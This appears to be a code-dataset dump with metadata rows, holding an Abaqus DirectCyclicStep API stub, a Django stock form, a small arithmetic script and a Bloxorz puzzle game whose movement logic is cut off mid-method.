from ..StepOutput.FieldOutputRequestState import FieldOutputRequestState
from ..StepOutput.HistoryOutputRequestState import HistoryOutputRequestState
from ..StepOutput.Monitor import Monitor
from ..StepOutput.Restart import Restart
class DirectCyclicStep(AnalysisStep):
"""The DirectCyclicStep object is used to provide a direct cyclic procedure for nonlinear,
non-isothermal quasi-static analysis. It can also be used to predict progressive damage
and failure for ductile bulk materials and/or to predict delamination/debonding growth
at the interfaces in laminated composites in a low-cycle fatigue analysis.
The DirectCyclicStep object is derived from the AnalysisStep object.
Attributes
----------
name: str
A String specifying the repository key.
timePeriod: float
A Float specifying the time of single loading cycle. The default value is 1.0.
timeIncrementationMethod: SymbolicConstant
A SymbolicConstant specifying the time incrementation method to be used. Possible values
are FIXED and AUTOMATIC. The default value is AUTOMATIC.
maxNumInc: int
An Int specifying the maximum number of increments in a step. The default value is 100.
initialInc: float
A Float specifying the initial time increment. The default value is the total time
period for the step.
minInc: float
A Float specifying the minimum time increment allowed. The default value is the smaller
of the suggested initial time increment or 10−5 times the total time period.
maxInc: float
A Float specifying the maximum time increment allowed. The default value is the total
time period for the step.
maxNumIterations: int
An Int specifying the maximum number of iterations in a step. The default value is 200.
initialTerms: int
An Int specifying the initial number of terms in the Fourier series. The default value
is 11.
maxTerms: int
An Int specifying the maximum number of terms in the Fourier series. The default value
is 25.
termsIncrement: int
An Int specifying the increment in number of terms in the Fourier series. The default
value is 5.
deltmx: float
A Float specifying the maximum temperature change to be allowed in an increment. The
default value is 0.0.
cetol: float
A Float specifying the maximum difference in the creep strain increment calculated from
the creep strain rates at the beginning and end of the increment. The default value is
0.0.
fatigue: Boolean
A Boolean specifying whether to include low-cycle fatigue analysis. The default value is
OFF.
continueAnalysis: Boolean
A Boolean specifying whether the displacement solution in the Fourier series obtained in
the previous direct cyclic step is used as the starting values for the current step. The
default value is OFF.
minCycleInc: int
An Int specifying the minimum number of cycles over which the damage is extrapolated
forward. The default value is 100.
maxCycleInc: int
An Int specifying the maximum number of cycles over which the damage is extrapolated
forward. The default value is 1000.
maxNumCycles: SymbolicConstant
The SymbolicConstant DEFAULT or an Int specifying the maximum number of cycles allowed
in a step or DEFAULT. A value of 1 plus half of the maximum number of cycles will be
used if DEFAULT is specified. The default value is DEFAULT.
damageExtrapolationTolerance: float
A Float specifying the maximum extrapolated damage increment. The default value is 1.0.
matrixStorage: SymbolicConstant
A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
extrapolation: SymbolicConstant
A SymbolicConstant specifying the type of extrapolation to use in determining the
incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
PARABOLIC. The default value is LINEAR.
convertSDI: SymbolicConstant
A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
CONVERT_SDI_ON. The default value is PROPAGATED.
previous: str
A String specifying the name of the previous step. The new step appears after this step
in the list of analysis steps.
description: str
A String specifying a description of the new step. The default value is an empty string.
timePoints: str
None or a String specifying a String specifying the name of a time :py:class:`~.point` object used to
determine at which times the response of the structure will be evaluated. The default
value is NONE.
explicit: SymbolicConstant
A SymbolicConstant specifying whether the step has an explicit procedure type
(**procedureType=ANNEAL**, DYNAMIC_EXPLICIT, or DYNAMIC_TEMP_DISPLACEMENT).
perturbation: Boolean
A Boolean specifying whether the step has a perturbation procedure type.
nonmechanical: Boolean
A Boolean specifying whether the step has a mechanical procedure type.
procedureType: SymbolicConstant
A SymbolicConstant specifying the Abaqus procedure. Possible values are:
- ANNEAL
- BUCKLE
- COMPLEX_FREQUENCY
- COUPLED_TEMP_DISPLACEMENT
- COUPLED_THERMAL_ELECTRIC
- DIRECT_CYCLIC
- DYNAMIC_IMPLICIT
- DYNAMIC_EXPLICIT
- DYNAMIC_SUBSPACE
- DYNAMIC_TEMP_DISPLACEMENT
- COUPLED_THERMAL_ELECTRICAL_STRUCTURAL
- FREQUENCY
- GEOSTATIC
- HEAT_TRANSFER
- MASS_DIFFUSION
- MODAL_DYNAMICS
- RANDOM_RESPONSE
- RESPONSE_SPECTRUM
- SOILS
- STATIC_GENERAL
- STATIC_LINEAR_PERTURBATION
- STATIC_RIKS
- STEADY_STATE_DIRECT
- STEADY_STATE_MODAL
- STEADY_STATE_SUBSPACE
- VISCO
suppressed: Boolean
A Boolean specifying whether the step is suppressed or not. The default value is OFF.
fieldOutputRequestState: dict[str, FieldOutputRequestState]
A repository of :py:class:`~abaqus.StepOutput.FieldOutputRequestState.FieldOutputRequestState` objects.
historyOutputRequestState: dict[str, HistoryOutputRequestState]
A repository of :py:class:`~abaqus.StepOutput.HistoryOutputRequestState.HistoryOutputRequestState` objects.
diagnosticPrint: DiagnosticPrint
A :py:class:`~abaqus.StepOutput.DiagnosticPrint.DiagnosticPrint` object.
monitor: Monitor
A :py:class:`~abaqus.StepOutput.Monitor.Monitor` object.
restart: Restart
A :py:class:`~abaqus.StepOutput.Restart.Restart` object.
adaptiveMeshConstraintStates: dict[str, AdaptiveMeshConstraintState]
A repository of :py:class:`~abaqus.Adaptivity.AdaptiveMeshConstraintState.AdaptiveMeshConstraintState` objects.
adaptiveMeshDomains: dict[str, AdaptiveMeshDomain]
A repository of :py:class:`~abaqus.Adaptivity.AdaptiveMeshDomain.AdaptiveMeshDomain` objects.
control: Control
A :py:class:`~abaqus.StepMiscellaneous.Control.Control` object.
solverControl: SolverControl
A :py:class:`~abaqus.StepMiscellaneous.SolverControl.SolverControl` object.
boundaryConditionStates: dict[str, BoundaryConditionState]
A repository of :py:class:`~abaqus.BoundaryCondition.BoundaryConditionState.BoundaryConditionState` objects.
interactionStates: int
A repository of :py:class:`~abaqus.Interaction.InteractionState.InteractionState` objects.
loadStates: dict[str, LoadState]
A repository of :py:class:`~abaqus.Load.LoadState.LoadState` objects.
loadCases: dict[str, LoadCase]
A repository of :py:class:`~abaqus.Load.LoadCase.LoadCase` objects.
predefinedFieldStates: dict[str, PredefinedFieldState]
A repository of :py:class:`~abaqus.PredefinedField.PredefinedFieldState.PredefinedFieldState` objects.
Notes
-----
This object can be accessed by:
.. code-block:: python
import step
mdb.models[name].steps[name]
The corresponding analysis keywords are:
- DIRECT CYCLIC
- STEP
"""
# A String specifying the repository key.
name: str = ''
# A Float specifying the time of single loading cycle. The default value is 1.0.
timePeriod: float = 1
# A SymbolicConstant specifying the time incrementation method to be used. Possible values
# are FIXED and AUTOMATIC. The default value is AUTOMATIC.
timeIncrementationMethod: SymbolicConstant = AUTOMATIC
# An Int specifying the maximum number of increments in a step. The default value is 100.
maxNumInc: int = 100
# A Float specifying the initial time increment. The default value is the total time
# period for the step.
initialInc: float = None
# A Float specifying the minimum time increment allowed. The default value is the smaller
# of the suggested initial time increment or 10−5 times the total time period.
minInc: float = None
# A Float specifying the maximum time increment allowed. The default value is the total
# time period for the step.
maxInc: float = None
# An Int specifying the maximum number of iterations in a step. The default value is 200.
maxNumIterations: int = 200
# An Int specifying the initial number of terms in the Fourier series. The default value
# is 11.
initialTerms: int = 11
# An Int specifying the maximum number of terms in the Fourier series. The default value
# is 25.
maxTerms: int = 25
# An Int specifying the increment in number of terms in the Fourier series. The default
# value is 5.
termsIncrement: int = 5
# A Float specifying the maximum temperature change to be allowed in an increment. The
# default value is 0.0.
deltmx: float = 0
# A Float specifying the maximum difference in the creep strain increment calculated from
# the creep strain rates at the beginning and end of the increment. The default value is
# 0.0.
cetol: float = 0
# A Boolean specifying whether to include low-cycle fatigue analysis. The default value is
# OFF.
fatigue: Boolean = OFF
# A Boolean specifying whether the displacement solution in the Fourier series obtained in
# the previous direct cyclic step is used as the starting values for the current step. The
# default value is OFF.
continueAnalysis: Boolean = OFF
# An Int specifying the minimum number of cycles over which the damage is extrapolated
# forward. The default value is 100.
minCycleInc: int = 100
# An Int specifying the maximum number of cycles over which the damage is extrapolated
# forward. The default value is 1000.
maxCycleInc: int = 1000
# The SymbolicConstant DEFAULT or an Int specifying the maximum number of cycles allowed
# in a step or DEFAULT. A value of 1 plus half of the maximum number of cycles will be
# used if DEFAULT is specified. The default value is DEFAULT.
maxNumCycles: SymbolicConstant = DEFAULT
# A Float specifying the maximum extrapolated damage increment. The default value is 1.0.
damageExtrapolationTolerance: float = 1
# A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
# UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
matrixStorage: SymbolicConstant = SOLVER_DEFAULT
# A SymbolicConstant specifying the type of extrapolation to use in determining the
# incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
# PARABOLIC. The default value is LINEAR.
extrapolation: SymbolicConstant = LINEAR
# A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
# occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
# CONVERT_SDI_ON. The default value is PROPAGATED.
convertSDI: SymbolicConstant = PROPAGATED
# A String specifying the name of the previous step. The new step appears after this step
# in the list of analysis steps.
previous: str = ''
# A String specifying a description of the new step. The default value is an empty string.
description: str = ''
# None or a String specifying a String specifying the name of a time point object used to
# determine at which times the response of the structure will be evaluated. The default
# value is NONE.
timePoints: str = NONE
# A SymbolicConstant specifying whether the step has an explicit procedure type
# (*procedureType*=ANNEAL, DYNAMIC_EXPLICIT, or DYNAMIC_TEMP_DISPLACEMENT).
explicit: SymbolicConstant = None
# A Boolean specifying whether the step has a perturbation procedure type.
perturbation: Boolean = OFF
# A Boolean specifying whether the step has a mechanical procedure type.
nonmechanical: Boolean = OFF
# A SymbolicConstant specifying the Abaqus procedure. Possible values are:
# - ANNEAL
# - BUCKLE
# - COMPLEX_FREQUENCY
# - COUPLED_TEMP_DISPLACEMENT
# - COUPLED_THERMAL_ELECTRIC
# - DIRECT_CYCLIC
# - DYNAMIC_IMPLICIT
# - DYNAMIC_EXPLICIT
# - DYNAMIC_SUBSPACE
# - DYNAMIC_TEMP_DISPLACEMENT
# - COUPLED_THERMAL_ELECTRICAL_STRUCTURAL
# - FREQUENCY
# - GEOSTATIC
# - HEAT_TRANSFER
# - MASS_DIFFUSION
# - MODAL_DYNAMICS
# - RANDOM_RESPONSE
# - RESPONSE_SPECTRUM
# - SOILS
# - STATIC_GENERAL
# - STATIC_LINEAR_PERTURBATION
# - STATIC_RIKS
# - STEADY_STATE_DIRECT
# - STEADY_STATE_MODAL
# - STEADY_STATE_SUBSPACE
# - VISCO
procedureType: SymbolicConstant = None
# A Boolean specifying whether the step is suppressed or not. The default value is OFF.
suppressed: Boolean = OFF
# A repository of FieldOutputRequestState objects.
fieldOutputRequestState: dict[str, FieldOutputRequestState] = dict[str, FieldOutputRequestState]()
# A repository of HistoryOutputRequestState objects.
historyOutputRequestState: dict[str, HistoryOutputRequestState] = dict[str, HistoryOutputRequestState]()
# A DiagnosticPrint object.
diagnosticPrint: DiagnosticPrint = DiagnosticPrint()
# A Monitor object.
monitor: Monitor = None
# A Restart object.
restart: Restart = Restart()
# A repository of AdaptiveMeshConstraintState objects.
adaptiveMeshConstraintStates: dict[str, AdaptiveMeshConstraintState] = dict[
str, AdaptiveMeshConstraintState]()
# A repository of AdaptiveMeshDomain objects.
adaptiveMeshDomains: dict[str, AdaptiveMeshDomain] = dict[str, AdaptiveMeshDomain]()
# A Control object.
control: Control = Control()
# A SolverControl object.
solverControl: SolverControl = SolverControl()
# A repository of BoundaryConditionState objects.
boundaryConditionStates: dict[str, BoundaryConditionState] = dict[str, BoundaryConditionState]()
# A repository of InteractionState objects.
interactionStates: int = None
# A repository of LoadState objects.
loadStates: dict[str, LoadState] = dict[str, LoadState]()
# A repository of LoadCase objects.
loadCases: dict[str, LoadCase] = dict[str, LoadCase]()
# A repository of PredefinedFieldState objects.
predefinedFieldStates: dict[str, PredefinedFieldState] = dict[str, PredefinedFieldState]()
def __init__(self, name: str, previous: str, description: str = '', timePeriod: float = 1,
timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
initialInc: float = None, minInc: float = None, maxInc: float = None,
maxNumIterations: int = 200, initialTerms: int = 11, maxTerms: int = 25,
termsIncrement: int = 5, deltmx: float = 0, cetol: float = 0, timePoints: str = NONE,
fatigue: Boolean = OFF, continueAnalysis: Boolean = OFF, minCycleInc: int = 100,
maxCycleInc: int = 1000, maxNumCycles: SymbolicConstant = DEFAULT,
damageExtrapolationTolerance: float = 1,
matrixStorage: SymbolicConstant = SOLVER_DEFAULT,
extrapolation: SymbolicConstant = LINEAR, maintainAttributes: Boolean = False,
convertSDI: SymbolicConstant = PROPAGATED):
"""This method creates a DirectCyclicStep object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].DirectCyclicStep
Parameters
----------
name
A String specifying the repository key.
previous
A String specifying the name of the previous step. The new step appears after this step
in the list of analysis steps.
description
A String specifying a description of the new step. The default value is an empty string.
timePeriod
A Float specifying the time of single loading cycle. The default value is 1.0.
timeIncrementationMethod
A SymbolicConstant specifying the time incrementation method to be used. Possible values
are FIXED and AUTOMATIC. The default value is AUTOMATIC.
maxNumInc
An Int specifying the maximum number of increments in a step. The default value is 100.
initialInc
A Float specifying the initial time increment. The default value is the total time
period for the step.
minInc
A Float specifying the minimum time increment allowed. The default value is the smaller
of the suggested initial time increment or 10−5 times the total time period.
maxInc
A Float specifying the maximum time increment allowed. The default value is the total
time period for the step.
maxNumIterations
An Int specifying the maximum number of iterations in a step. The default value is 200.
initialTerms
An Int specifying the initial number of terms in the Fourier series. The default value
is 11.
maxTerms
An Int specifying the maximum number of terms in the Fourier series. The default value
is 25.
termsIncrement
An Int specifying the increment in number of terms in the Fourier series. The default
value is 5.
deltmx
A Float specifying the maximum temperature change to be allowed in an increment. The
default value is 0.0.
cetol
A Float specifying the maximum difference in the creep strain increment calculated from
the creep strain rates at the beginning and end of the increment. The default value is
0.0.
timePoints
None or a String specifying a String specifying the name of a time point object used to
determine at which times the response of the structure will be evaluated. The default
value is NONE.
fatigue
A Boolean specifying whether to include low-cycle fatigue analysis. The default value is
OFF.
continueAnalysis
A Boolean specifying whether the displacement solution in the Fourier series obtained in
the previous direct cyclic step is used as the starting values for the current step. The
default value is OFF.
minCycleInc
An Int specifying the minimum number of cycles over which the damage is extrapolated
forward. The default value is 100.
maxCycleInc
An Int specifying the maximum number of cycles over which the damage is extrapolated
forward. The default value is 1000.
maxNumCycles
The SymbolicConstant DEFAULT or an Int specifying the maximum number of cycles allowed
in a step or DEFAULT. A value of 1 plus half of the maximum number of cycles will be
used if DEFAULT is specified. The default value is DEFAULT.
damageExtrapolationTolerance
A Float specifying the maximum extrapolated damage increment. The default value is 1.0.
matrixStorage
A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
extrapolation
A SymbolicConstant specifying the type of extrapolation to use in determining the
incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
PARABOLIC. The default value is LINEAR.
maintainAttributes
A Boolean specifying whether to retain attributes from an existing step with the same
name. The default value is False.
convertSDI
A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
CONVERT_SDI_ON. The default value is PROPAGATED.
Returns
-------
A DirectCyclicStep object.
Raises
------
RangeError
"""
super().__init__()
pass
def setValues(self, description: str = '', timePeriod: float = 1,
timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
initialInc: float = None, minInc: float = None, maxInc: float = None,
maxNumIterations: int = 200, initialTerms: int = 11, maxTerms: int = 25,
termsIncrement: int = 5, deltmx: float = 0, cetol: float = 0, timePoints: str = NONE,
fatigue: Boolean = OFF, continueAnalysis: Boolean = OFF, minCycleInc: int = 100,
maxCycleInc: int = 1000, maxNumCycles: SymbolicConstant = DEFAULT,
damageExtrapolationTolerance: float = 1,
matrixStorage: SymbolicConstant = SOLVER_DEFAULT,
extrapolation: SymbolicConstant = LINEAR, convertSDI: SymbolicConstant = PROPAGATED):
"""This method modifies the DirectCyclicStep object.
Parameters
----------
description
A String specifying a description of the new step. The default value is an empty string.
timePeriod
A Float specifying the time of single loading cycle. The default value is 1.0.
timeIncrementationMethod
A SymbolicConstant specifying the time incrementation method to be used. Possible values
are FIXED and AUTOMATIC. The default value is AUTOMATIC.
maxNumInc
An Int specifying the maximum number of increments in a step. The default value is 100.
initialInc
A Float specifying the initial time increment. The default value is the total time
period for the step.
minInc
A Float specifying the minimum time increment allowed. The default value is the smaller
of the suggested initial time increment or 10−5 times the total time period.
maxInc
A Float specifying the maximum time increment allowed. The default value is the total
time period for the step.
maxNumIterations
An Int specifying the maximum number of iterations in a step. The default value is 200.
initialTerms
An Int specifying the initial number of terms in the Fourier series. The default value
is 11.
maxTerms
An Int specifying the maximum number of terms in the Fourier series. The default value
is 25.
termsIncrement
An Int specifying the increment in number of terms in the Fourier series. The default
value is 5.
deltmx
A Float specifying the maximum temperature change to be allowed in an increment. The
default value is 0.0.
cetol
A Float specifying the maximum difference in the creep strain increment calculated from
the creep strain rates at the beginning and end of the increment. The default value is
0.0.
timePoints
None or a String specifying a String specifying the name of a time point object used to
determine at which times the response of the structure will be evaluated. The default
value is NONE.
fatigue
A Boolean specifying whether to include low-cycle fatigue analysis. The default value is
OFF.
continueAnalysis
A Boolean specifying whether the displacement solution in the Fourier series obtained in
the previous direct cyclic step is used as the starting values for the current step. The
default value is OFF.
minCycleInc
An Int specifying the minimum number of cycles over which the damage is extrapolated
forward. The default value is 100.
maxCycleInc
An Int specifying the maximum number of cycles over which the damage is extrapolated
forward. The default value is 1000.
maxNumCycles
The SymbolicConstant DEFAULT or an Int specifying the maximum number of cycles allowed
in a step or DEFAULT. A value of 1 plus half of the maximum number of cycles will be
used if DEFAULT is specified. The default value is DEFAULT.
damageExtrapolationTolerance
A Float specifying the maximum extrapolated damage increment. The default value is 1.0.
matrixStorage
A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
extrapolation
A SymbolicConstant specifying the type of extrapolation to use in determining the
incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
PARABOLIC. The default value is LINEAR.
convertSDI
A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
CONVERT_SDI_ON. The default value is PROPAGATED.
Raises
------
RangeError
"""
pass
| 48.377622
| 119
| 0.691638
| 3,260
| 27,672
| 5.841718
| 0.086503
| 0.049884
| 0.074827
| 0.084804
| 0.810702
| 0.765228
| 0.740968
| 0.716184
| 0.713453
| 0.71193
| 0
| 0.009166
| 0.266659
| 27,672
| 571
| 120
| 48.462347
| 0.929089
| 0.735509
| 0
| 0.211765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023529
| false
| 0.023529
| 0.176471
| 0
| 0.729412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
83ce81529de513a89cfd68a87631c64a2bd34b7d
| 1,054
|
py
|
Python
|
stock/forms.py
|
WitnessEncrypter/rappsystems
|
15b81ae933a084180eab6637a20b748126eae0f9
|
[
"MIT"
] | null | null | null |
stock/forms.py
|
WitnessEncrypter/rappsystems
|
15b81ae933a084180eab6637a20b748126eae0f9
|
[
"MIT"
] | null | null | null |
stock/forms.py
|
WitnessEncrypter/rappsystems
|
15b81ae933a084180eab6637a20b748126eae0f9
|
[
"MIT"
] | null | null | null |
from django import forms
class AddStock(forms.Form):
stock_name = forms.CharField(max_length=200,widget=forms.TextInput(attrs={'class':'form-control','placeholder':'Enter Stock Item Name'}))
stock_category = forms.CharField(max_length=200,widget=forms.TextInput(attrs={'class':'form-control','placeholder':'Enter Category'}))
purchase_price = forms.CharField(max_length=200,widget=forms.TextInput(attrs={'class':'form-control','placeholder':'Enter Stock Price'}))
client_id = forms.CharField(max_length=200,widget=forms.TextInput(attrs={'class':'form-control','placeholder':'Enter Client ID'}))
stock_quantity = forms.CharField(max_length=200,widget=forms.TextInput(attrs={'class':'form-control','placeholder':'Enter Stock Quantity'}))
stock_unit = forms.CharField(max_length=200,widget=forms.TextInput(attrs={'class':'form-control','placeholder':'Enter Stock Unit'}))
selling_price_per_unit = forms.CharField(max_length=200,widget=forms.TextInput(attrs={'class':'form-control','placeholder':'Enter Stock Selling Price'}))
| 81.076923
| 157
| 0.760911
| 137
| 1,054
| 5.737226
| 0.211679
| 0.124682
| 0.151399
| 0.204835
| 0.78117
| 0.78117
| 0.78117
| 0.78117
| 0.78117
| 0.78117
| 0
| 0.021407
| 0.06926
| 1,054
| 12
| 158
| 87.833333
| 0.779817
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
793defadc47678235c765e7509f4204da95aa252
| 32
|
py
|
Python
|
python_practice/9.7 test 7.py
|
ccom33/python_practice
|
9a3551610c46b0bae15542575033e8ed7e967289
|
[
"MIT"
] | null | null | null |
python_practice/9.7 test 7.py
|
ccom33/python_practice
|
9a3551610c46b0bae15542575033e8ed7e967289
|
[
"MIT"
] | null | null | null |
python_practice/9.7 test 7.py
|
ccom33/python_practice
|
9a3551610c46b0bae15542575033e8ed7e967289
|
[
"MIT"
] | null | null | null |
a = a+1
a += 1
b = b-5
b -= 5
| 4.571429
| 7
| 0.3125
| 10
| 32
| 1
| 0.4
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 0.4375
| 32
| 6
| 8
| 5.333333
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f715bca80298b84ce5bd4435a0da66ffc75de251
| 19,652
|
py
|
Python
|
Bloxorz.py
|
ilkercankaya/Bloxorz
|
212e8f051329f4f7392e336b9a99d5c4ae78c019
|
[
"MIT"
] | null | null | null |
Bloxorz.py
|
ilkercankaya/Bloxorz
|
212e8f051329f4f7392e336b9a99d5c4ae78c019
|
[
"MIT"
] | null | null | null |
Bloxorz.py
|
ilkercankaya/Bloxorz
|
212e8f051329f4f7392e336b9a99d5c4ae78c019
|
[
"MIT"
] | null | null | null |
# 0 is for perpendicular mode
# 1 is for flat mode
# 0 is for X-Axis config
# 1 is for Y-Axis mode
from copy import deepcopy
class Block:
def __init__(self, givenboard, mode, config, positionfirstbox, positionsecondbox):
# Copy Board
self.board = givenboard
# Fill the Board with Block
self.board.field[positionfirstbox[0]][positionfirstbox[1]] = 2
if positionsecondbox != []:
self.board.field[positionsecondbox[0]][positionsecondbox[1]] = 2
self.mode = mode
self.config = config
self.positionFirstBox = positionfirstbox
self.positionSecondBox = positionsecondbox
def isgamewon(self):
if self.mode == 0 and self.positionFirstBox == self.board.goal:
return True
else:
return False
def ismovableleft(self):
try:
if self.mode == 0:
if self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] != 1 \
and self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 2] != 1:
return True
else:
return False
elif self.mode == 1:
if self.config == 0:
if self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] != 1:
return True
else:
return False
if self.config == 1:
if self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] != 1 \
and self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1] - 1] != 1:
return True
else:
return False
except IndexError:
return False
def ismovableright(self):
try:
if self.mode == 0:
if self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 1] != 1 \
and self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 2] != 1:
return True
else:
return False
elif self.mode == 1:
if self.config == 0:
if self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1] + 1] != 1:
return True
else:
return False
if self.config == 1:
if self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 1] != 1 \
and self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1] + 1] != 1:
return True
else:
return False
except IndexError:
return False
def ismovableup(self):
try:
if self.mode == 0:
if self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] != 1 \
and self.board.field[self.positionFirstBox[0] - 2][self.positionFirstBox[1]] != 1:
return True
else:
return False
elif self.mode == 1:
if self.config == 0:
if self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] != 1 \
and self.board.field[self.positionSecondBox[0] - 1][self.positionSecondBox[1]] != 1:
return True
else:
return False
elif self.config == 1:
if self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] != 1:
return True
else:
return False
except IndexError:
return False
def ismovabledown(self):
try:
if self.mode == 0:
if self.board.field[self.positionFirstBox[0] + 1][self.positionFirstBox[1]] != 1 \
and self.board.field[self.positionFirstBox[0] + 2][self.positionFirstBox[1]] != 1:
return True
else:
return False
elif self.mode == 1:
if self.config == 0:
if self.board.field[self.positionFirstBox[0] + 1][self.positionFirstBox[1]] != 1 \
and self.board.field[self.positionSecondBox[0] + 1][self.positionSecondBox[1]] != 1:
return True
else:
return False
elif self.config == 1:
if self.board.field[self.positionSecondBox[0] + 1][self.positionSecondBox[1]] != 1:
return True
else:
return False
except IndexError:
return False
def getleft(self):
if self.mode == 0:
# Object location
secondbox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
firstbox = [self.positionFirstBox[0], self.positionFirstBox[1] - 2]
return [firstbox, secondbox, 1, 0]
elif self.mode == 1:
if self.config == 0:
firstbox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
return [firstbox, [], 0, self.config]
if self.config == 1:
positionSecondBox = [self.positionSecondBox[0], self.positionSecondBox[1] - 1]
positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
return [positionFirstBox, positionSecondBox, 1, self.config]
def moveleft(self):
if self.mode == 0:
if self.ismovableleft():
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] = 2
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 2] = 2
# Update object location
self.positionSecondBox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
self.positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] - 2]
# Change Mode and Config
self.mode = 1
self.config = 0
return True
else:
return False
elif self.mode == 1:
if self.ismovableleft():
if self.config == 0:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] = 2
# Update object location
self.positionSecondBox = []
self.positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
# Change Mode
self.mode = 0
return True
if self.config == 1:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] - 1] = 2
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1] - 1] = 2
# Update object location
self.positionSecondBox = [self.positionSecondBox[0], self.positionSecondBox[1] - 1]
self.positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] - 1]
return True
else:
return False
def moveright(self):
if self.mode == 0:
if self.ismovableright():
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 1] = 2
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 2] = 2
# Update object location
self.positionSecondBox = [self.positionFirstBox[0], self.positionFirstBox[1] + 2]
self.positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] + 1]
# Change Mode
self.mode = 1
self.config = 0
return True
else:
return False
elif self.mode == 1:
if self.ismovableright():
if self.config == 0:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionSecondBox[1] + 1] = 2
# Update object location
self.positionFirstBox = [self.positionFirstBox[0], self.positionSecondBox[1] + 1]
self.positionSecondBox = []
# Change Mode
self.mode = 0
return True
if self.config == 1:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1] + 1] = 2
